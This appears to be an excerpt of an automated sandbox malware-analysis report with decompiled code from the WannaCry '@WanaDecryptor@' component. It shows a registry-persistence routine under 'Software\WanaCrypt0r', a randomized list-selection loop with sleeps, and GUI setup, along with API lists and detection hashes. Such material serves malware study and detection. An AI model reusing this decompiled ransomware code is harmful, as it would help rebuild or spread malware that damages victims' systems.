                                  0x004126a7
                                  0x004126a8
                                  0x004126ad
                                  0x004126b3
                                  0x004126b6
                                  0x004126b8
                                  0x004126ba
                                  0x004126bf
                                  0x004126c4
                                  0x004126c7
                                  0x004126c7
                                  0x004126d3
                                  0x004126db
                                  0x004126f4
                                  0x004126f6
                                  0x004126f9
                                  0x004126fc
                                  0x00000000
                                  0x00000000
                                  0x004126fe
                                  0x00412700
                                  0x0041273c
                                  0x0041273c
                                  0x00412702
                                  0x00412702
                                  0x0041271a
                                  0x0041271e
                                  0x00412720
                                  0x0041275f
                                  0x00412722
                                  0x00412722
                                  0x00412724
                                  0x00000000
                                  0x00412726
                                  0x00000000
                                  0x00412726
                                  0x00412724
                                  0x00412704
                                  0x00412714
                                  0x00412716
                                  0x00412718
                                  0x00412732
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412718
                                  0x00412702
                                  0x00412765
                                  0x00412765
                                  0x0041276d
                                  0x00412770
                                  0x00412770
                                  0x00412779
                                  0x0041278f
                                  0x00000000
                                  0x0041278f
                                  0x00412728
                                  0x00000000
                                  0x0041263a
                                  0x00412646
                                  0x00412646
                                  0x00412510
                                  0x00412510
                                  0x00412513
                                  0x00412524
                                  0x0041252b
                                  0x0041252d
                                  0x0041252f
                                  0x0041253f
                                  0x00412542
                                  0x0041254a
                                  0x00412556
                                  0x00412531
                                  0x00412531
                                  0x00412533
                                  0x00000000
                                  0x00412535
                                  0x00412535
                                  0x00412537
                                  0x00412559
                                  0x00412561
                                  0x00412569
                                  0x00412575
                                  0x00412539
                                  0x00412539
                                  0x0041253d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041253d
                                  0x00412537
                                  0x00412533
                                  0x00412518
                                  0x00412518
                                  0x00412521
                                  0x00412521
                                  0x00412513
                                  0x004124c2
                                  0x004124ce
                                  0x004124ce
                                  0x0041238d
                                  0x00412399
                                  0x00412399
                                  0x0041237b
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %s%s$%s%s%s$:
                                  • API String ID: 0-3034790606
                                  • Opcode ID: 8e6b1c0f2cb56c42e6e36ab9d60359e8445b3ce9f897c3f3fd7fecc5fb48561e
                                  • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                  • Opcode Fuzzy Hash: 8e6b1c0f2cb56c42e6e36ab9d60359e8445b3ce9f897c3f3fd7fecc5fb48561e
                                  • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401C70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 426 401c70-401cd8 wcscat 427 401cdc-401cde 426->427 428 401ce0-401cef 427->428 429 401cf1-401cfb 427->429 430 401d00-401d0c RegCreateKeyW 428->430 429->430 431 401d12-401d1b 430->431 432 401dad-401db5 430->432 433 401d62-401d8e RegQueryValueExA 431->433 434 401d1d-401d60 GetCurrentDirectoryA RegSetValueExA 431->434 432->427 435 401dbb-401dc7 432->435 436 401d9e-401dab RegCloseKey 433->436 437 401d90-401d98 SetCurrentDirectoryA 433->437 434->436 436->432 438 401dc8-401dd7 436->438 437->436
                                  C-Code - Quality: 84%
                                  			E00401C70(signed int _a4) {
				void _v519;
				char _v520;
				void _v700;
				short _v720;
				int _v724;
				void* _v728;
				int _t30;
				void* _t36;
				signed int _t38;
				signed int _t46;
				signed int _t56;
				int _t72;
				void* _t77;

				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
				_v520 = _t30;
				memset( &_v519, _t30, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				_v728 = 0;
				wcscat( &_v720, L"WanaCrypt0r");
				_t72 = 0;
				_v724 = 0;
				do {
					if(_t72 != 0) {
						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
					} else {
						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
					}
					_t36 = _v728;
					if(_t36 == 0) {
						goto L10;
					} else {
						_t56 = _a4;
						if(_t56 == 0) {
							_v724 = 0x207;
							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
							asm("sbb esi, esi");
							_t77 =  ~_t38 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v520);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v520);
							asm("repne scasb");
							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
							_t72 = _v724;
							asm("sbb esi, esi");
							_t77 =  ~_t46 + 1;
						}
						RegCloseKey(_v728); // executed
						if(_t77 != 0) {
							return 1;
						} else {
							goto L10;
						}
					}
					L13:
					L10:
					_t72 = _t72 + 1;
					_v724 = _t72;
				} while (_t72 < 2);
				return 0;
				goto L13;
			}
















                                  0x00401c95
                                  0x00401ca3
                                  0x00401caf
                                  0x00401cb1
                                  0x00401cb3
                                  0x00401cb8
                                  0x00401cc1
                                  0x00401cd6
                                  0x00401cd8
                                  0x00401cdc
                                  0x00401cde
                                  0x00401d00
                                  0x00401ce0
                                  0x00401d00
                                  0x00401d00
                                  0x00401d06
                                  0x00401d0c
                                  0x00000000
                                  0x00401d12
                                  0x00401d12
                                  0x00401d1b
                                  0x00401d79
                                  0x00401d81
                                  0x00401d8b
                                  0x00401d8d
                                  0x00401d8e
                                  0x00401d98
                                  0x00401d98
                                  0x00401d1d
                                  0x00401d2a
                                  0x00401d38
                                  0x00401d53
                                  0x00401d55
                                  0x00401d5d
                                  0x00401d5f
                                  0x00401d5f
                                  0x00401da3
                                  0x00401dab
                                  0x00401dd7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401dab
                                  0x00000000
                                  0x00401dad
                                  0x00401dad
                                  0x00401db1
                                  0x00401db1
                                  0x00401dc7
                                  0x00000000

                                  APIs
                                  • wcscat.MSVCRT ref: 00401CC1
                                  • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                  • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                  • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                  • RegQueryValueExA.KERNELBASE ref: 00401D81
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                  • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                  • String ID: Software\$WanaCrypt0r
                                  • API String ID: 3883271862-1723423467
                                  • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                  • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BAF0 Relevance: 15.3, APIs: 10, Instructions: 301stringsleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 439 40baf0-40bb16 call 40ba10 442 40bdf5 439->442 443 40bb1c-40bb36 439->443 444 40bdf8-40be10 442->444 446 40bb38-40bb47 call 40ba60 443->446 447 40bb4d-40bbb5 call 40c8f0 strtok 443->447 446->444 446->447 452 40bc30-40bc3f 447->452 453 40bbb7 447->453 454 40bc41-40bc48 452->454 455 40bc7e-40bc90 call 40ba60 452->455 456 40bbbb-40bbc0 453->456 457 40bc4d-40bc55 454->457 465 40bc92-40bce7 call 40c860 #825 455->465 466 40bcec-40bd01 GetTickCount srand 455->466 458 40bbc2-40bc16 call 40c7b0 call 40c920 call 40c800 call 40c7b0 456->458 459 40bc1b-40bc2e strtok 456->459 461 40bc75-40bc77 457->461 462 40bc57-40bc59 457->462 458->459 459->452 459->456 469 40bc7a-40bc7c 461->469 467 40bc71-40bc73 462->467 468 40bc5b-40bc65 462->468 465->444 472 40bdc7-40bdf2 call 40c860 #825 466->472 473 40bd07-40bd1c rand 466->473 467->469 468->461 474 40bc67-40bc6f 468->474 469->455 469->466 472->442 478 40bd26-40bd28 473->478 479 40bd1e 473->479 474->457 474->467 484 40bd32-40bd3a 478->484 485 40bd2a 478->485 483 40bd20-40bd24 479->483 483->478 483->483 488 40bd41-40bd73 call 40ba60 484->488 489 40bd3c 484->489 487 40bd2c-40bd30 485->487 487->484 487->487 493 40be11-40be4c 488->493 494 40bd79-40bdc1 call 40ce50 #825 Sleep 488->494 489->488 495 40be75-40be84 #825 493->495 496 40be4e-40be73 call 402d90 call 40c740 493->496 494->472 494->473 495->444 496->495
                                  C-Code - Quality: 86%
                                  			E0040BAF0() {
				signed int _t71;
				signed int _t72;
				void* _t84;
				signed int _t86;
				signed int _t91;
				signed int _t92;
				signed int _t97;
				intOrPtr _t101;
				signed int _t110;
				void* _t113;
				void* _t116;
				signed int _t126;
				char _t129;
				signed int _t131;
				unsigned int _t138;
				signed int _t139;
				char* _t144;
				signed int _t147;
				unsigned int _t152;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				signed int _t161;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t181;
				signed int _t191;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t237;
				char* _t238;
				void* _t240;
				void* _t241;
				intOrPtr* _t242;
				void* _t245;
				intOrPtr* _t246;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				void* _t252;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t259;
				void* _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_push(0xffffffff);
				_push(E00414286);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t251;
				_t252 = _t251 - 0x47c;
				_t71 = E0040BA10();
				if(_t71 != 0) {
					L31:
					_t72 = _t71 | 0xffffffff;
					__eflags = _t72;
				} else {
					_t131 =  *0x422210; // 0xb24228
					 *((intOrPtr*)( *_t131 + 0xc))();
					asm("repne scasb");
					_t266 =  !(_t131 | 0xffffffff) == 1;
					if( !(_t131 | 0xffffffff) == 1) {
						L3:
						_t249 = 0;
						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
						 *(_t252 + 0x1c) = 0;
						asm("repne scasb");
						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
						 *((intOrPtr*)(_t252 + 0x498)) = 0;
						_t139 = _t138 >> 2;
						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
						_t255 = _t252 + 0x18;
						_t144 = _t255 + 0xa8;
						_t238 = strtok(_t144, ",;");
						_t256 = _t255 + 8;
						if(_t238 != 0) {
							_t129 =  *((intOrPtr*)(_t256 + 0x13));
							do {
								_t200 = _t249;
								_t249 = _t249 + 1;
								if(_t200 > 0) {
									_t181 = _t256 + 0x28;
									 *(_t256 + 0x28) = _t129;
									E0040C7B0(_t181, 0);
									asm("repne scasb");
									_push( !(_t181 | 0xffffffff) - 1);
									_push(_t238);
									E0040C920(_t256 + 0x2c);
									 *((char*)(_t256 + 0x4a0)) = 1;
									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
									_t144 = _t256 + 0x28;
									 *((char*)(_t256 + 0x498)) = 0;
									E0040C7B0(_t144, 1);
								}
								_t238 = strtok(0, ",;");
								_t256 = _t256 + 8;
							} while (_t238 != 0);
						}
						asm("repne scasb");
						_t147 =  !(_t144 | 0xffffffff) - 1;
						if(_t147 == 0) {
							L17:
							_push(_t256 + 0xa4);
							_t84 = E0040BA60(_t277);
							_t256 = _t256 + 4;
							if(_t84 != 0) {
								goto L19;
							} else {
								asm("repne scasb");
								_t172 =  !(_t147 | 0xffffffff);
								_t245 = _t256 + 0xa4 - _t172;
								_t173 = _t172 >> 2;
								memcpy(0x422214, _t245, _t173 << 2);
								_t263 = _t256 + 0xc;
								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
								_t264 = _t263 + 0xc;
								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
								_push( *((intOrPtr*)(_t264 + 0x18)));
								L00412C98();
								_t252 = _t264 + 4;
								_t72 = 0;
							}
						} else {
							_t246 = _t256 + 0xa4;
							_t116 = 0x422214;
							while(1) {
								_t198 =  *_t116;
								_t147 = _t198;
								if(_t198 !=  *_t246) {
									break;
								}
								if(_t147 == 0) {
									L14:
									_t116 = 0;
								} else {
									_t24 = _t116 + 1; // 0x0
									_t199 =  *_t24;
									_t147 = _t199;
									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
										break;
									} else {
										_t116 = _t116 + 2;
										_t246 = _t246 + 2;
										if(_t147 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								L16:
								_t277 = _t116;
								if(_t116 == 0) {
									L19:
									srand(GetTickCount());
									_t86 =  *(_t256 + 0x20);
									_t257 = _t256 + 4;
									__eflags = _t86;
									if(_t86 <= 0) {
										L30:
										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
										_push( *((intOrPtr*)(_t257 + 0x18)));
										L00412C98();
										_t252 = _t257 + 4;
										goto L31;
									} else {
										do {
											_t191 = rand() % _t86;
											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
											__eflags = _t191;
											_t91 = _t191;
											if(_t191 > 0) {
												_t91 = 0;
												__eflags = 0;
												do {
													_t250 =  *_t250;
													_t191 = _t191 - 1;
													__eflags = _t191;
												} while (_t191 != 0);
											}
											__eflags = _t91;
											if(_t91 < 0) {
												_t110 =  ~_t91;
												do {
													_t250 =  *((intOrPtr*)(_t250 + 4));
													_t110 = _t110 - 1;
													__eflags = _t110;
												} while (_t110 != 0);
											}
											_t92 =  *(_t250 + 0xc);
											_t42 = _t250 + 8; // 0x8
											_t126 = _t42;
											__eflags = _t92;
											if(__eflags == 0) {
												_t92 = 0x41ba38;
											}
											asm("repne scasb");
											_t152 =  !(_t147 | 0xffffffff);
											_t240 = _t92 - _t152;
											_t153 = _t152 >> 2;
											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
											_t259 = _t257 + 0x18;
											_t158 = _t259 + 0x40;
											_push(_t158);
											_t97 = E0040BA60(__eflags);
											_t260 = _t259 + 4;
											__eflags = _t97;
											if(_t97 == 0) {
												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
												asm("repne scasb");
												_t160 =  !(_t158 | 0xffffffff);
												_t241 = _t260 + 0x40 - _t160;
												_t161 = _t160 >> 2;
												memcpy(0x422214, _t241, _t161 << 2);
												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
												_t262 = _t260 + 0x18;
												_t242 =  *((intOrPtr*)(_t262 + 0x18));
												_t101 =  *_t242;
												__eflags = _t101 - _t242;
												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
												if(_t101 != _t242) {
													do {
														_push(0);
														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
												}
												_push( *((intOrPtr*)(_t262 + 0x18)));
												L00412C98();
												_t252 = _t262 + 4;
												_t72 = 0;
											} else {
												goto L29;
											}
											goto L32;
											L29:
											_t169 =  *0x422210; // 0xb24228
											 *((intOrPtr*)( *_t169 + 0xc))();
											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
											_t147 = _t126;
											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
											E0040CE50(_t147, 0);
											_push(_t250);
											L00412C98();
											_t257 = _t260 + 4;
											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
											Sleep(0xbb8); // executed
											_t86 =  *(_t257 + 0x1c);
											__eflags = _t86;
										} while (_t86 > 0);
										goto L30;
									}
								} else {
									goto L17;
								}
								goto L32;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L16;
						}
					} else {
						_push(0x422214);
						_t72 = E0040BA60(_t266);
						_t252 = _t252 + 4;
						if(_t72 != 0) {
							goto L3;
						}
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
				return _t72;
			}





















































                                  0x0040baf6
                                  0x0040baf8
                                  0x0040bafd
                                  0x0040bafe
                                  0x0040bb05
                                  0x0040bb0f
                                  0x0040bb16
                                  0x0040bdf5
                                  0x0040bdf5
                                  0x0040bdf5
                                  0x0040bb1c
                                  0x0040bb1c
                                  0x0040bb24
                                  0x0040bb31
                                  0x0040bb35
                                  0x0040bb36
                                  0x0040bb4d
                                  0x0040bb51
                                  0x0040bb53
                                  0x0040bb62
                                  0x0040bb66
                                  0x0040bb7d
                                  0x0040bb7f
                                  0x0040bb8a
                                  0x0040bb8e
                                  0x0040bb95
                                  0x0040bb9f
                                  0x0040bb9f
                                  0x0040bba1
                                  0x0040bbae
                                  0x0040bbb0
                                  0x0040bbb5
                                  0x0040bbb7
                                  0x0040bbbb
                                  0x0040bbbb
                                  0x0040bbbd
                                  0x0040bbc0
                                  0x0040bbc4
                                  0x0040bbc8
                                  0x0040bbcc
                                  0x0040bbd8
                                  0x0040bbdd
                                  0x0040bbde
                                  0x0040bbe3
                                  0x0040bbfb
                                  0x0040bc03
                                  0x0040bc0a
                                  0x0040bc0e
                                  0x0040bc16
                                  0x0040bc16
                                  0x0040bc27
                                  0x0040bc29
                                  0x0040bc2c
                                  0x0040bbbb
                                  0x0040bc3a
                                  0x0040bc3e
                                  0x0040bc3f
                                  0x0040bc7e
                                  0x0040bc85
                                  0x0040bc86
                                  0x0040bc8b
                                  0x0040bc90
                                  0x00000000
                                  0x0040bc92
                                  0x0040bc9c
                                  0x0040bc9e
                                  0x0040bca8
                                  0x0040bcb0
                                  0x0040bcb3
                                  0x0040bcb3
                                  0x0040bcb7
                                  0x0040bcc5
                                  0x0040bcc5
                                  0x0040bcd3
                                  0x0040bcdc
                                  0x0040bcdd
                                  0x0040bce2
                                  0x0040bce5
                                  0x0040bce5
                                  0x0040bc41
                                  0x0040bc41
                                  0x0040bc48
                                  0x0040bc4d
                                  0x0040bc4d
                                  0x0040bc51
                                  0x0040bc55
                                  0x00000000
                                  0x00000000
                                  0x0040bc59
                                  0x0040bc71
                                  0x0040bc71
                                  0x0040bc5b
                                  0x0040bc5b
                                  0x0040bc5b
                                  0x0040bc61
                                  0x0040bc65
                                  0x00000000
                                  0x0040bc67
                                  0x0040bc67
                                  0x0040bc6a
                                  0x0040bc6f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bc6f
                                  0x0040bc65
                                  0x0040bc7a
                                  0x0040bc7a
                                  0x0040bc7c
                                  0x0040bcec
                                  0x0040bcf3
                                  0x0040bcf8
                                  0x0040bcfc
                                  0x0040bcff
                                  0x0040bd01
                                  0x0040bdc7
                                  0x0040bdcb
                                  0x0040bde3
                                  0x0040bdec
                                  0x0040bded
                                  0x0040bdf2
                                  0x00000000
                                  0x0040bd07
                                  0x0040bd07
                                  0x0040bd10
                                  0x0040bd16
                                  0x0040bd18
                                  0x0040bd1a
                                  0x0040bd1c
                                  0x0040bd1e
                                  0x0040bd1e
                                  0x0040bd20
                                  0x0040bd20
                                  0x0040bd23
                                  0x0040bd23
                                  0x0040bd23
                                  0x0040bd20
                                  0x0040bd26
                                  0x0040bd28
                                  0x0040bd2a
                                  0x0040bd2c
                                  0x0040bd2c
                                  0x0040bd2f
                                  0x0040bd2f
                                  0x0040bd2f
                                  0x0040bd2c
                                  0x0040bd32
                                  0x0040bd35
                                  0x0040bd35
                                  0x0040bd38
                                  0x0040bd3a
                                  0x0040bd3c
                                  0x0040bd3c
                                  0x0040bd4c
                                  0x0040bd4e
                                  0x0040bd54
                                  0x0040bd58
                                  0x0040bd62
                                  0x0040bd62
                                  0x0040bd64
                                  0x0040bd68
                                  0x0040bd69
                                  0x0040bd6e
                                  0x0040bd71
                                  0x0040bd73
                                  0x0040be1a
                                  0x0040be25
                                  0x0040be27
                                  0x0040be2d
                                  0x0040be34
                                  0x0040be37
                                  0x0040be3e
                                  0x0040be3e
                                  0x0040be40
                                  0x0040be44
                                  0x0040be46
                                  0x0040be48
                                  0x0040be4c
                                  0x0040be4e
                                  0x0040be52
                                  0x0040be6a
                                  0x0040be6f
                                  0x0040be6f
                                  0x0040be4e
                                  0x0040be79
                                  0x0040be7a
                                  0x0040be7f
                                  0x0040be82
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bd79
                                  0x0040bd79
                                  0x0040bd81
                                  0x0040bd8c
                                  0x0040bd94
                                  0x0040bd96
                                  0x0040bd99
                                  0x0040bd9e
                                  0x0040bd9f
                                  0x0040bda8
                                  0x0040bdb1
                                  0x0040bdb5
                                  0x0040bdbb
                                  0x0040bdbf
                                  0x0040bdbf
                                  0x00000000
                                  0x0040bd07
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bc7c
                                  0x0040bc75
                                  0x0040bc77
                                  0x00000000
                                  0x0040bc77
                                  0x0040bb38
                                  0x0040bb38
                                  0x0040bb3d
                                  0x0040bb42
                                  0x0040bb47
                                  0x00000000
                                  0x00000000
                                  0x0040bb47
                                  0x0040bb36
                                  0x0040bdf8
                                  0x0040be03
                                  0x0040be10

                                  APIs
                                  • strtok.MSVCRT ref: 0040BBA9
                                  • strtok.MSVCRT ref: 0040BC22
                                  • #825.MFC42(?,?), ref: 0040BCDD
                                  • GetTickCount.KERNEL32 ref: 0040BCEC
                                  • srand.MSVCRT ref: 0040BCF3
                                  • rand.MSVCRT ref: 0040BD09
                                  • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                  • Sleep.KERNELBASE(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                  • #825.MFC42(?,?,?,?), ref: 0040BDED
                                    • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                  • #825.MFC42(?), ref: 0040BE7A
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$strtok$CountSleepTickrandsrand
                                  • String ID:
                                  • API String ID: 1749417438-0
                                  • Opcode ID: 6219d4958e8a19e0ebe0a886ed27d3e3574d5edb02869f1b1397cf79b1e415cd
                                  • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                  • Opcode Fuzzy Hash: 6219d4958e8a19e0ebe0a886ed27d3e3574d5edb02869f1b1397cf79b1e415cd
                                  • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004085C0 Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 504 4085c0-408652 #567 #341 GetSysColor * 4 KiUserCallbackDispatcher 505 408660-4086a6 #6140 504->505 506 408654-408658 504->506 506->505 507 40865a-40865e GetSysColor 506->507 507->505
                                  C-Code - Quality: 83%
                                  			E004085C0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				long _v20;
				void _v24;
				intOrPtr _v28;
				int _t33;
				intOrPtr _t50;
				long _t53;
				intOrPtr _t55;

				_push(0xffffffff);
				_push(E00413FF3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_t50 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x4157f0;
				_v4 = 0;
				L00412F74();
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x80)) = 0;
				_v4 = 1;
				 *((intOrPtr*)(__ecx)) = 0x4161a4;
				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
				_t53 = GetSysColor(2);
				_v20 = _t53;
				_v24 = 0;
				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
				if(_t33 != 0 && _v24 != 0) {
					_t53 = GetSysColor(0x1b);
				}
				_push(0xffffffff);
				_push(2);
				L00412F50();
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
				 *((intOrPtr*)(_t50 + 0x68)) = 0;
				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
				 *((intOrPtr*)(_t50 + 0x54)) = 0;
				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
				 *[fs:0x0] = _v20;
				return _t50;
			}












                                  0x004085c0
                                  0x004085c2
                                  0x004085cd
                                  0x004085ce
                                  0x004085db
                                  0x004085de
                                  0x004085e2
                                  0x004085e7
                                  0x004085f2
                                  0x004085f6
                                  0x00408601
                                  0x00408604
                                  0x00408607
                                  0x0040860a
                                  0x00408612
                                  0x00408617
                                  0x00408621
                                  0x00408628
                                  0x0040862f
                                  0x00408634
                                  0x00408642
                                  0x00408646
                                  0x0040864a
                                  0x00408652
                                  0x0040865e
                                  0x0040865e
                                  0x00408660
                                  0x00408662
                                  0x00408667
                                  0x00408674
                                  0x0040867d
                                  0x00408680
                                  0x00408687
                                  0x0040868a
                                  0x00408691
                                  0x00408694
                                  0x0040869c
                                  0x004086a6

                                  APIs
                                  • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                  • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                  • GetSysColor.USER32 ref: 0040861D
                                  • GetSysColor.USER32(00000009), ref: 00408624
                                  • GetSysColor.USER32(00000012), ref: 0040862B
                                  • GetSysColor.USER32(00000002), ref: 00408632
